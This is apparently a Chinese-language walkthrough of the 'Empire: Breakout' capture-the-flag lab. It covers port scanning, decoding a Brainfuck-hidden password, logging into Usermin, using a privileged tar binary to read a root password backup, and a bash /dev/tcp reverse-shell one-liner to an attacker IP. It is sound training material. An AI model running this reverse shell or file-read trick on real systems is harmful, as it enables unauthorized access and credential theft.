Empire: Breakout

靶机地址

通过 nmap 扫描拿到 IP 和开放的端口

image-20250501153748009

image-20250501153741507

访问 80 端口知道是一个 Ubuntu+Apache 的服务器,但是在下边藏了一个 hint

image-20250501153801253

1
2
3
4
5
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->

这个是 brainfuck 语言,这里给一个在线的和本地的:
https://www.splitbrain.org/services/ook
https://github.com/fabianishere/brainfuck

1
.2uqPEfj3D<P'a-3

10000 和 20000 端口一个是 Webmin 另一个是 Usermin 的登录界面。然后刚才 nmap 扫的时候,存在一个 smb 服务,知道了用户名,然后结合 brainfuck 解出来的尝试登录

image-20250501153727347

成功登录进 20000 端口的 Usermin,然后在终端执行命令,拿到第一个 flag

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

读了下 /etc/passwd 发现当前用户只是一个低权限用户,也不能用 sudo 和 SUID 文件提权,那就找找有没有敏感文件泄露

1
find / -type f -name "*pass*" 2>/dev/null

image-20250501153718290

找到了一个备份文件,但是没有权限读取,不过在当前目录下有一个高权限的 tar 程序,那么就可以使用当前目录下的命令进行压缩,然后再解压,就可以读取到了

image-20250501153711704

1
2
3
./tar -cvf ./pass.tar /var/backups/.old_pass.bak
tar -xvf ./pass.tar
tac var/backups/.old_pass.bak

image-20250501153700757

Ts&4&YurgtRX(=~h

拿到了 root 用户的密码,但是不能直接在这里提权,得把 shell 反弹出来才行

1
bash -i >& /dev/tcp/192.168.234.129/9099 0>&1

image-20250501153651834

3mp!R3{You_Manage_To_BreakOut_From_My_System_Congratulation}